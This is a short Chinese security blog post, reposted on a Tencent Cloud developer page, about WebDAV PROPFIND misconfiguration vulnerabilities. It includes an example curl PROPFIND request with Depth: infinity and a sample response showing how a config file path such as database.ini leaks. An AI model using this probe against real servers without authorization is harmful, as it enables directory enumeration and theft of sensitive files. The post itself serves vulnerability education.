前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >SRC 小漏洞

SRC 小漏洞

作者头像
Khan安全团队
发布于 2025-04-04 07:41:16
发布于 2025-04-04 07:41:16
13200
代码可运行
举报
文章被收录于专栏:Khan安全团队Khan安全团队
运行总次数:0
代码可运行

PROPFIND 漏洞是与 WebDAV(Web Distributed Authoring and Versioning) 协议相关的一种安全漏洞,主要涉及 HTTP 方法 PROPFIND 的不当实现或配置。

PROPFIND 漏洞的原理

漏洞通常由以下原因引发:

  • 不安全的配置服务器未正确限制 PROPFIND 方法的访问权限。
  • 目录遍历漏洞攻击者可能通过 PROPFIND 请求访问本应受限的目录或文件(例如通过 Depth: infinity 参数递归遍历目录)。
  • 信息泄露服务器可能通过 PROPFIND 响应返回敏感信息(如内部文件路径、系统配置等)。
  • 拒绝服务(DoS)攻击者可能发送大量复杂的 PROPFIND 请求,导致服务器资源耗尽。

漏洞的影响

  • 敏感信息泄露攻击者可获取服务器上的文件列表、目录结构或其他元数据。
  • 权限绕过通过遍历目录访问受限文件(如配置文件、日志文件)。
  • 服务器入侵结合其他漏洞(如文件上传漏洞),可能导致远程代码执行(RCE)。
  • 服务中断通过 DoS 攻击使服务器无法响应正常请求。

示例

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
curl -X PROPFIND http://example.com/webdav/ -H "Depth: infinity" -H "Content-Type: text/xml" --data '<D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>'
  • Depth: infinity表示递归遍历所有子目录。
  • <D:allprop/>请求返回所有文件属性。

如果服务器配置不当,可能返回类似以下信息:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<D:multistatus xmlns:D="DAV:">
  <D:response>
    <D:href>/webdav/</D:href>
    <D:propstat>
      <D:prop>
        <D:displayname>webdav</D:displayname>
        <D:getlastmodified>Fri, 01 Jan 2023 00:00:00 GMT</D:getlastmodified>
      </D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
  </D:response>
  <D:response>
    <D:href>/webdav/config/</D:href>
    <D:propstat>
      <D:prop>
        <D:displayname>config</D:displayname>
      </D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
  </D:response>
  <D:response>
    <D:href>/webdav/config/database.ini</D:href>
    <D:propstat>
      <D:prop>
        <D:displayname>database.ini</D:displayname>
      </D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
  </D:response>
</D:multistatus>
  • 攻击者通过响应发现了 /webdav/config/database.ini 文件路径。攻击者可以直接下载该文件。
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-04-03,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全攻防实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
使用C#WebClient类访问(上传/下载/删除/列出文件目录)由IIS搭建的http文件服务器
前言  为什么要写这边博文呢?其实,就是使用C#WebClient类访问由IIS搭建的http文件服务器的问题花了我足足两天的时间,因此,有必要写下自己所学到的,同时,也能让广大的博友学习学习一下。
CNXY
2017/12/25
2.6K0
使用C#WebClient类访问(上传/下载/删除/列出文件目录)由IIS搭建的http文件服务器
【中间件】一些中间件的相关漏洞总结v1.0
废话不多说,让我们直接开始吧~(好啦我承认今天的表情包是因为好想去迪斯尼,难道是上年纪了吗,嗯?)
一名白帽的成长史
2019/10/08
1.6K0
【中间件】一些中间件的相关漏洞总结v1.0
题目2-IIS写权限漏洞分析溯源
IP地址 : 219.153.49.228 端口 : 48336 协议 : http 其他 : [点击访问]
tea9
2022/07/16
1.9K0
题目2-IIS写权限漏洞分析溯源
【漏洞加固】常见Web漏洞修复建议
Web程序中对于用户提交的参数未做过滤直接拼接到SQL语句中执行,导致参数中的特殊字符破坏了SQL语句原有逻辑,攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
腾讯云-MSS服务
2020/12/03
6.9K1
关于项目里面的硬核漏洞(找不到漏洞看这里)
以下漏洞过于硬核又比较相对容易挖掘,毕竟我是实习两年半的低危文档工程师。(可能写的不太全)适合在渗透里面没有找到漏洞,以防尴尬。
Khan安全团队
2020/03/24
2.4K0
关于项目里面的硬核漏洞(找不到漏洞看这里)
干货|超详细的常见漏洞原理笔记总结
sql注入是就是通过把SQL语句插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
网络安全自修室
2022/12/06
2.1K0
干货|超详细的常见漏洞原理笔记总结
Web中间件常见漏洞总结
IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。最初是Windows NT版本的可选包,随后内置在Windows 2000、Windows XP Professional和Windows Server 2003一起发行,但在Windows XP Home版本上并没有IIS。IIS是一种Web(网页)服务组件,其中包括Web服务器、FTP服务器、NNTP服务器和SMTP服务器,分别用于网页浏览、文件传输、新闻服务和邮件发送等方面,它使得在网络(包括互联网和局域网)上发布信息成了一件很容易的事。
FB客服
2019/05/09
4.5K0
Web中间件常见漏洞总结
Web中间件漏洞之IIS篇
IIS 是 Internet Information Services 的缩写,意为互联网信息服务,是由微软公司提供的基于运行 Microsoft Windows 的互联网基本服务。最初是 Windows NT 版本的可选包,随后内置在 Windows 2000 、Windows XP Professional 和 Windows Server 2003 一起发行,但在 Windows XP Home 版本上并没有 IIS 。
第59号实验室
2023/05/12
2K0
Web中间件漏洞之IIS篇
渗透知识总结
web应用程序没有对输入的数据进行安全过滤,或者过滤不全面,导致攻击者通过将恶意的SQL语句插入到应用的输入参数中,再在后台SQL服务器上解析执行进行的攻击。
LuckySec
2022/11/02
2.7K0
网站安全防护 渗透测试解析漏洞详情
天气逐渐变凉,但渗透测试的热情温度感觉不到凉,因为有我们的存在公开分享渗透实战经验过程,才会让这个秋冬变得不再冷,近期有反映在各个环境下的目录解析漏洞的检测方法,那么本节由我们Sine安全的高级渗透架构师来详细的讲解平常用到的web环境检测点和网站漏洞防护办法。
网站安全专家
2019/10/23
9680
网站安全防护 渗透测试解析漏洞详情
原创Paper | Cisco RV340 wfapp 命令注入漏洞(CVE-2022-20827)分析
作者:Rivaille@知道创宇404实验室 日期:2022年8月29日 漏洞原理 这个漏洞是cisco RV340和cisco RV160系列中存在的一个命令注入漏洞,命令注入发生在wfapp中,漏洞原理如下。 wfapp运行后会检查当前/tmp/webrootdb目录下是否存在webfilter数据库文件,如果存在,则不向服务器发送更新数据库的请求,如果不存在,则会拉取更新。同时wfapp会创建守护进程,24小时会自动更新一次webfilter数据库。wfapp的启动过程写入在/etc/init.d/w
Seebug漏洞平台
2022/08/29
8790
原创Paper | Cisco RV340 wfapp 命令注入漏洞(CVE-2022-20827)分析
关于WebDAV带来的网站潜在安全问题的疑问
WebDAV:分布式创作和版本控制协议 (Web-based Distributed Authoring and Versioning) 一种基于 HTTP 1.1协议的通信协议。它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可直接对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。
程序员一一涤生
2019/09/10
2.5K0
SRC漏洞挖掘经验+技巧篇
很多人挖洞的时候说不知道如何入手,其实挖洞就是信息收集+常规owasp top 10+逻辑漏洞(重要的可能就是思路猥琐一点),这些漏洞的测试方法本身不是特别复杂,一般混迹在安全圈子的人都能复现漏洞。接下来我就着重说一下我在信息收集方面的心得。
HACK学习
2019/08/06
9.8K0
SRC漏洞挖掘经验+技巧篇
【文件上传与解析】文件上传与解析漏洞总结v1.0
大多数网站都有文件上传的接口,如果没有对上传的文件类型做严格的限制,会导致攻击者可以上传恶意文件。(例如Webshell)
一名白帽的成长史
2019/10/08
1.7K0
【文件上传与解析】文件上传与解析漏洞总结v1.0
常规36个WEB渗透测试漏洞描述及修复方法--很详细
  apache一些样例文件没有删除,可能存在cookie、session伪造,进行后台登录操作
Power7089
2021/09/15
2.7K0
PHP 文件包含漏洞姿势总结
文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。
信安之路
2018/08/08
4.2K0
PHP 文件包含漏洞姿势总结
渗透专题丨web Top10 漏洞简述(3)
• CORS: 跨域资源共享是一种放宽同源策略的机制,它允许浏览器向跨源服务器,发出 XMLHttpRequest 请求,从而克服了 AJAX 只能同源使用的限制,以使不同的网站可以跨域获取数据。
极安御信安全研究院
2023/06/14
5150
渗透专题丨web Top10 漏洞简述(3)
SSRF漏洞总结
SSRF(Server-Side Request Forgery):指目标应用存在一种漏洞,利用该漏洞攻击者可以控制目标web应用的后端程序向任意ip地址/语言发送http请求或者其他数据包
全栈程序员站长
2022/09/12
1.6K0
SSRF漏洞总结
【漏洞预警】IIS 6.0曝远程代码执行漏洞CVE-2017-7269
漏洞描述 微软方面也已经确认了该漏洞:Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过
FB客服
2018/02/23
1.1K0
【漏洞预警】IIS 6.0曝远程代码执行漏洞CVE-2017-7269
IIS6.0 CVE-2017-7269 漏洞复现
在目前很多的攻防比赛中,IIS6.0仍然会出现,因此,我们再次再来和大家一起学习一波此漏洞的利用。
墙角睡大觉
2019/09/24
2.1K0
IIS6.0 CVE-2017-7269 漏洞复现
推荐阅读
相关推荐
使用C#WebClient类访问(上传/下载/删除/列出文件目录)由IIS搭建的http文件服务器
更多 >
领券
💥开发者 MCP广场重磅上线!
精选全网热门MCP server,让你的AI更好用 🚀
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验